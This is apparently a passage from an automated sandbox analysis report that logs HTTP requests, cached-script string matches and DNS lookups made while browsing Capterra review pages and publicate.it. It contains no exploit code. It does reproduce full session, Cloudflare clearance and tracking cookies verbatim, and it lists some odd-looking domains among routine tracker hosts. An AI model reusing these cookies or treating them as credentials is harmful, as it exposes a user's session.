https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUID=0752D3E2ED77641A3B63C709EC70657F
        Source: global trafficHTTP traffic detected: GET /visitor/v200/svrGP?pps=3&siteid=68275882&ref2=https%3A%2F%2Fwww.capterra.com%2F&tzo=300&ms=211&optin=disabled&firstPartyCookieDomain=tracking.capterra.com HTTP/1.1Host: tracking.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; __mmapiwsid=0191a413-777d-7f0e-8692-1332553a85ac:1b0310bf727feb6b0af3dec08c5bfd86689f2e28; fs_lua=1.1725034624710; fs_uid=#18VAT4#da9f39f7-d4a4-45f4-948f-86299cb47816:084a7745-8adb-4b14-adf2-26e4e4ddbd6e:1725034624710::1#/1756570623; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A17%3A07+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=NotLandingPage&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1&AwaitingReconsent=false; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034632.35.0.0
        Source: global trafficHTTP traffic detected: GET /p/insights/t/5067725 HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUID=0752D3E2ED77641A3B63C709EC70657F
        Source: global trafficHTTP traffic detected: GET /dest5.html?d_nsid=0 HTTP/1.1Host: evantaagartnercompany.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=63748165052475827072314916508265657231
        Source: global trafficHTTP traffic detected: GET /signals/config/585643694936481?v=2.9.166&r=stable&domain=reviews.capterra.com&hme=da9a399065fb1c492026018b9e54864148adfb49d800f41752428fb7b59190f8&ex_m=69%2C118%2C104%2C108%2C60%2C4%2C97%2C68%2C16%2C94%2C86%2C50%2C53%2C168%2C171%2C183%2C179%2C180%2C182%2C29%2C98%2C52%2C75%2C181%2C163%2C166%2C176%2C177%2C184%2C127%2C40%2C34%2C139%2C15%2C49%2C190%2C189%2C129%2C18%2C39%2C1%2C42%2C64%2C65%2C66%2C70%2C90%2C17%2C14%2C93%2C89%2C88%2C105%2C51%2C107%2C38%2C106%2C30%2C91%2C26%2C164%2C167%2C136%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C56%2C61%2C63%2C73%2C99%2C27%2C74%2C9%2C8%2C78%2C47%2C21%2C101%2C100%2C102%2C95%2C10%2C20%2C3%2C19%2C83%2C55%2C81%2C33%2C72%2C0%2C92%2C32%2C80%2C85%2C46%2C45%2C84%2C37%2C5%2C87%2C79%2C43%2C35%2C82%2C2%2C36%2C62%2C41%2C103%2C44%2C77%2C67%2C109%2C59%2C58%2C31%2C96%2C57%2C54%2C48%2C76%2C71%2C24%2C110 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /id?d_visid_ver=5.1.1&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=04D07E1C5E4DDABB0A495ED1%40AdobeOrg&d_nsid=0&ts=1725034633424 HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=63748165052475827072314916508265657231
        Source: global trafficHTTP traffic detected: GET /datalayer/v4/latest.js HTTP/1.1Host: edge.fullstory.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /visitor/v200/svrGP.aspx?pps=3&siteid=68275882&ref2=https%3A%2F%2Fwww.capterra.com%2F&tzo=300&ms=211&optin=disabled&elq1pcGUID=E0C2E43BC92D468AACBFD54EF3B6885A HTTP/1.1Host: tracking.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; __mmapiwsid=0191a413-777d-7f0e-8692-1332553a85ac:1b0310bf727feb6b0af3dec08c5bfd86689f2e28; fs_lua=1.1725034624710; fs_uid=#18VAT4#da9f39f7-d4a4-45f4-948f-86299cb47816:084a7745-8adb-4b14-adf2-26e4e4ddbd6e:1725034624710::1#/1756570623; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A17%3A07+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=NotLandingPage&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1&AwaitingReconsent=false; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034632.35.0.0; _uetsid=5154566066eb11ef9610b7a0af03a19e; _uetvid=5154816066eb11efb250d7a43de017cc; AMCVS_04D07E1C5E4DDABB0A495ED1%40AdobeOrg=1; AMCV_04D07E1C5E4DDABB0A495ED1%40AdobeOrg=-637568504%7CMCIDTS%7C19966%7CMCMID%7C59145117128128990483045357532560318612%7CMCAAMLH-1725639434%7C6%7CMCAAMB-1725639434%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1725041834s%7CNONE%7CvVersion%7C5.1.1
        Source: global trafficHTTP traffic detected: GET /cid/7dafa3f5f9e8efd6782940aa05719f12?assign=false&callback=u_294798340052452740 HTTP/1.1Host: c.lytics.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /api/personalize/7dafa3f5f9e8efd6782940aa05719f12/user/_uid/d0b770c2-2504-4a3b-9011-7567d0a062b1/iframe?segments=true&fields=dv360_id_ts&mergestate=true&ts=1725034635314 HTTP/1.1Host: c.lytics.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /p/insights/t/5067725 HTTP/1.1Host: bat.bing.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUID=0752D3E2ED77641A3B63C709EC70657F; MR=0
        Source: global trafficHTTP traffic detected: GET /datalayer/v4/latest.js HTTP/1.1Host: edge.fullstory.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /pagead/landing?gcs=G111&gcd=13t3t3t3t5l1&tag_exp=101529666&rnd=1599516134.1725034627&url=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F&dma=0&npa=0&gtm=45He48s0n81P4GLD4Nv76106154za200&auid=1810143887.1725034608 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
        Source: global trafficHTTP traffic detected: GET /p/insights/s/0.7.45 HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUID=0752D3E2ED77641A3B63C709EC70657F; MSPTC=n6tZBkA75OV6oqul_bzIpbncnO-GUEYstgU_Zy6nqg8; MR=0; MSPTC=pmKV2y-fAwi1fcU6ImmJ3igyaos-m5ZWMPvhw7xG0JM
        Source: global trafficHTTP traffic detected: GET /pubsub/5-2VrTcJ-wReFxxSsvN27p3l1l-rfQjhxEa0K_rcpidI_YYfbgqGBaXudDoBZfnBOD-yT-ZZ7mQ1OR91C6MrHx-21kDMXCDQnf8S3-?X-Nexus-New-Client=true&X-Nexus-Version=0.14.0&user_role=visitor HTTP/1.1Host: nexus-websocket-a.intercom.ioConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://publicate.itSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: Mt1yFdjQPWjwFhbPAr5YHw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
        Source: global trafficHTTP traffic detected: GET /tr/?id=585643694936481&ev=PageView&dl=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F&rl=https%3A%2F%2Fwww.capterra.com%2F&if=false&ts=1725034636169&sw=1280&sh=1024&v=2.9.166&r=stable&a=tmSimo-GTM-WebTemplate&ec=0&o=4126&fbp=fb.1.1725034636167.922766995701261619&ler=other&cdl=API_unavailable&it=1725034633476&coo=false&tm=1&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: chromecache_408.2.dr, chromecache_591.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/ equals www.facebook.com (Facebook)
        Source: chromecache_595.2.dr, chromecache_603.2.dr, chromecache_594.2.dr, chromecache_398.2.dr, chromecache_726.2.dr, chromecache_834.2.dr, chromecache_622.2.dr, chromecache_784.2.drString found in binary or memory: Math.round(q);v["gtm.videoElapsedTime"]=Math.round(f);v["gtm.videoPercent"]=r;v["gtm.videoVisible"]=t;return v},Vj:function(){e=Bb()},nd:function(){d()}}};var hc=ka(["data-gtm-yt-inspected-"]),wC=["www.youtube.com","www.youtube-nocookie.com"],xC,yC=!1; equals www.youtube.com (Youtube)
        Source: chromecache_622.2.drString found in binary or memory: N.getElementsByTagName("iframe"),ma=R.length,la=0;la<ma;la++)if(!u&&c(R[la],H.Ee)){XI("https://www.youtube.com/iframe_api");u=!0;break}})}}else G(v.vtp_gtmOnSuccess)}var q=["www.youtube.com","www.youtube-nocookie.com"],r={UNSTARTED:-1,ENDED:0,PLAYING:1,PAUSED:2,BUFFERING:3,CUED:5},t,u=!1;Z.__ytl=n;Z.__ytl.C="ytl";Z.__ytl.isVendorTemplate=!0;Z.__ytl.priorityOverride=0;Z.__ytl.isInfrastructure=!1; equals www.youtube.com (Youtube)
        Source: chromecache_408.2.dr, chromecache_591.2.drString found in binary or memory: __d("LiveChatPluginConstants",["$InternalEnum"],(function(a,b,c,d,e,f){"use strict";a="LiveChatEvent/";c="mqtt";d=b("$InternalEnum")({CONNECTED:"Connected",CONNECTING:"Connecting",DISCONNECTED:"Disconnected"});e=250;b=a+"close_timestamps";var g=a+"reset_badging",h=a+"state",i=a+"switch_account",j=a+"typing",k=a+"unread_count",l=a+"update_message_list",m="platform/plugins/connect/guest",n=a+"guest_upgrade_success",o=a+"guest_upgrade_success_incognito",p=a+"navigate_to_welcome_page",q="platform/plugins/connect/access_token";a=a+"start_re_engagement";var r=124,s=187,t=24,u=424,v=288,w=313,x=219,y=40,z=36,A=24,B=18,C=708,D=540,E=244,F=202,G=509,H=430,I=6,J=0,K=1,L=-1,M="messaging_plugin",N=8634e4,O="#8A8D91",P="entrypoint:customer_chat_plugin",Q=0,R=1,S=2,T=3,U="new_message_update",V="initial_fetch",W=5e3,X="https://www.facebook.com/business/help/1661027437357021";f.MQTT=c;f.MQTTGatewayConnectionState=d;f.LOGIN_CHECK_INTERVAL=e;f.CLOSE_TIMESTAMPS=b;f.RESET_BADGING=g;f.STATE_UPDATE=h;f.SWITCH_ACCOUNT=i;f.TYPING_UPDATE=j;f.UNREAD_COUNT_UPDATE=k;f.UPDATE_MESSAGE_LIST=l;f.GUEST_MODE_CONNECT=m;f.GUEST_UPGRADE_SUCCESS=n;f.GUEST_UPGRADE_SUCCESS_INCOGNITO=o;f.NAVIGATE_TO_WELCOME_PAGE=p;f.ACCESS_TOKEN_LOGIN=q;f.START_RE_ENGAGEMENT=a;f.PROMPT_FALLBACK_HEIGHT=r;f.PROMPT_REDESIGN_FALLBACK_HEIGHT=s;f.PROMPT_CONTAINER_PADDING_HEIGHT=t;f.WELCOME_PAGE_GUEST_FALLBACK_HEIGHT=u;f.WELCOME_PAGE_NO_GUEST_FALLBACK_HEIGHT=v;f.WELCOME_PAGE_GUEST_FALLBACK_HEIGHT_WITH_COMPACT=w;f.WELCOME_PAGE_NO_GUEST_FALLBACK_HEIGHT_WITH_COMPACT=x;f.WELCOME_PAGE_ATTRIBUTION_OFFEST_HEIGHT=y;f.WELCOME_PAGE_ATTRIBUTION_OFFSET_HEIGHT_WITH_COMPACT=z;f.MAIN_IFRAME_PADDING_HEIGHT=A;f.MAIN_IFRAME_PADDING_HEIGHT_WITH_COMPACT=B;f.THREAD_PAGE_HEIGHT=C;f.THREAD_PAGE_HEIGHT_COMPACT=D;f.RE_ENGAGEMENT_COLLAPSED_DIALOG_HEIGHT=E;f.RE_ENGAGEMENT_COLLAPSED_DIALOG_HEIGHT_COMPACT=F;f.RE_ENGAGEMENT_EXPANDED_DIALOG_HEIGHT=G;f.RE_ENGAGEMENT_EXPANDED_DIALOG_HEIGHT_COMPACT=H;f.GREETING_TEXT_BOTTOM_SPACING_OFFEST=I;f.LOGGED_IN_CHAT_MODE=J;f.GUEST_CHAT_MODE=K;f.INVALID_CHAT_MODE=L;f.MESSENGING_PLUGIN=M;f.GUEST_SESSION_STORAGE_VALIDITY_MS=N;f.GUEST_SEND_BUTTON_COLOR_EMPTY_INPUT=O;f.LIVE_CHAT_ENTRYPOINT_ATTRIBUTION_TAG=P;f.ITP_CONSISTENCY_UNKNOWN_LOGGED_OUT=Q;f.ITP_CONSISTENCY_CONSISTENT_LOGGED_IN=R;f.ITP_CONSISTENCY_INCONSISTENT=S;f.ITP_CONSISTENCY_CONSISTENT_NO_ITP=T;f.NEW_MESSAGE_UPDATE=U;f.INITIAL_FETCH=V;f.PLUGIN_FADE_DELAY=W;f.HELP_DEX_LINK=X}),66); equals www.facebook.com (Facebook)
        Source: chromecache_595.2.dr, chromecache_603.2.dr, chromecache_594.2.dr, chromecache_726.2.dr, chromecache_834.2.dr, chromecache_784.2.drString found in binary or memory: if(!(e||f||g||k.length||m.length))return;var p={Yg:e,Wg:f,Xg:g,Ih:k,Jh:m,Ee:n,Cb:b},q=D.YT;if(q)return q.ready&&q.ready(d),b;var r=D.onYouTubeIframeAPIReady;D.onYouTubeIframeAPIReady=function(){r&&r();d()};G(function(){for(var t=E.getElementsByTagName("script"),u=t.length,v=0;v<u;v++){var w=t[v].getAttribute("src");if(HC(w,"iframe_api")||HC(w,"player_api"))return b}for(var x=E.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!yC&&FC(x[A],p.Ee))return xc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
        Source: chromecache_352.2.dr, chromecache_807.2.dr, chromecache_566.2.dr, chromecache_525.2.dr, chromecache_615.2.dr, chromecache_339.2.dr, chromecache_568.2.dr, chromecache_378.2.drString found in binary or memory: return b}uC.J="internal.enableAutoEventOnTimer";var hc=ka(["data-gtm-yt-inspected-"]),wC=["www.youtube.com","www.youtube-nocookie.com"],xC,yC=!1; equals www.youtube.com (Youtube)
        Source: chromecache_408.2.dr, chromecache_591.2.drString found in binary or memory: window.FB&&window.FB.__buffer&&(window.__buffer=babelHelpers["extends"]({},window.FB.__buffer)); } }).call(global);})();} catch (__fb_err) {var __fb_i = new Image();__fb_i.crossOrigin = 'anonymous';__fb_i.dataset.testid = 'fbSDKErrorReport';__fb_i.src='https://www.facebook.com/platform/scribe_endpoint.php/?c=jssdk_error&m='+encodeURIComponent('{"error":"LOAD", "extra": {"name":"'+__fb_err.name+'","line":"'+(__fb_err.lineNumber||__fb_err.line)+'","script":"'+(__fb_err.fileName||__fb_err.sourceURL||__fb_err.script||"sdk.js")+'","stack":"'+(__fb_err.stackTrace||__fb_err.stack)+'","revision":"1016108272","namespace":"FB","message":"'+__fb_err.message+'"}}');document.body.appendChild(__fb_i);} equals www.facebook.com (Facebook)
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: prod.adobeccstatic.com
        Source: global trafficDNS traffic detected: DNS query: use.typekit.net
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: p.typekit.net
        Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
        Source: global trafficDNS traffic detected: DNS query: js-agent.newrelic.com
        Source: global trafficDNS traffic detected: DNS query: bam-cell.nr-data.net
        Source: global trafficDNS traffic detected: DNS query: pblc.me
        Source: global trafficDNS traffic detected: DNS query: img.pblc.it
        Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: pub-e1c6f3d85d51402790227684363ac52c.r2.dev
        Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: quantumspirel.ru
        Source: global trafficDNS traffic detected: DNS query: publicate.it
        Source: global trafficDNS traffic detected: DNS query: d3e54v103j8qbb.cloudfront.net
        Source: global trafficDNS traffic detected: DNS query: platform-api.sharethis.com
        Source: global trafficDNS traffic detected: DNS query: js.hs-scripts.com
        Source: global trafficDNS traffic detected: DNS query: sc.lfeeder.com
        Source: global trafficDNS traffic detected: DNS query: static.woopra.com
        Source: global trafficDNS traffic detected: DNS query: www.woopra.com
        Source: global trafficDNS traffic detected: DNS query: tr-rc.lfeeder.com
        Source: global trafficDNS traffic detected: DNS query: snap.licdn.com
        Source: global trafficDNS traffic detected: DNS query: static.hotjar.com
        Source: global trafficDNS traffic detected: DNS query: assets.getalvis.com
        Source: global trafficDNS traffic detected: DNS query: code.jquery.com
        Source: global trafficDNS traffic detected: DNS query: analytics.google.com
        Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
        Source: global trafficDNS traffic detected: DNS query: www.clarity.ms
        Source: global trafficDNS traffic detected: DNS query: public.profitwell.com
        Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
        Source: global trafficDNS traffic detected: DNS query: px.ads.linkedin.com
        Source: global trafficDNS traffic detected: DNS query: script.hotjar.com
        Source: global trafficDNS traffic detected: DNS query: www.linkedin.com
        Source: global trafficDNS traffic detected: DNS query: t.clarity.ms
        Source: global trafficDNS traffic detected: DNS query: widget.intercom.io
        Source: global trafficDNS traffic detected: DNS query: c.clarity.ms
        Source: global trafficDNS traffic detected: DNS query: js.intercomcdn.com
        Source: global trafficDNS traffic detected: DNS query: api-iam.intercom.io
        Source: global trafficDNS traffic detected: DNS query: nexus-websocket-a.intercom.io
        Source: global trafficDNS traffic detected: DNS query: www.capterra.com
        Source: global trafficDNS traffic detected: DNS query: js.driftt.com
        Source: global trafficDNS traffic detected: DNS query: i.vimeocdn.com
        Source: global trafficDNS traffic detected: DNS query: seoab.io
        Source: global trafficDNS traffic detected: DNS query: lead-acquisition-service.softwareadvice.com
        Source: global trafficDNS traffic detected: DNS query: gdm-catalog-fmapi-prod.imgix.net
        Source: global trafficDNS traffic detected: DNS query: www.datadoghq-browser-agent.com
        Source: global trafficDNS traffic detected: DNS query: cdn.cookielaw.org
        Source: global trafficDNS traffic detected: DNS query: unpkg.com
        Source: global trafficDNS traffic detected: DNS query: forms-as-a-service.capterra.com
        Source: global trafficDNS traffic detected: DNS query: customer.api.drift.com
        Source: global trafficDNS traffic detected: DNS query: conversation.api.drift.com
        Source: global trafficDNS traffic detected: DNS query: metrics.api.drift.com
        Source: global trafficDNS traffic detected: DNS query: targeting.api.drift.com
        Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
        Source: global trafficDNS traffic detected: DNS query: 8036043.fls.doubleclick.net
        Source: global trafficDNS traffic detected: DNS query: ad.doubleclick.net
        Source: global trafficDNS traffic detected: DNS query: geolocation.onetrust.com
        Source: global trafficDNS traffic detected: DNS query: adservice.google.com
        Source: global trafficDNS traffic detected: DNS query: reviews.capterra.com
        Source: global trafficDNS traffic detected: DNS query: browser-intake-datadoghq.com
        Source: global trafficDNS traffic detected: DNS query: www.ipqualityscore.com
        Source: global trafficDNS traffic detected: DNS query: device.maxmind.com
        Source: global trafficDNS traffic detected: DNS query: d-ipv6.mmapiws.com
        Source: global trafficDNS traffic detected: DNS query: reveal.clearbit.com
        Source: global trafficDNS traffic detected: DNS query: a.quora.com
        Source: global trafficDNS traffic detected: DNS query: img.en25.com
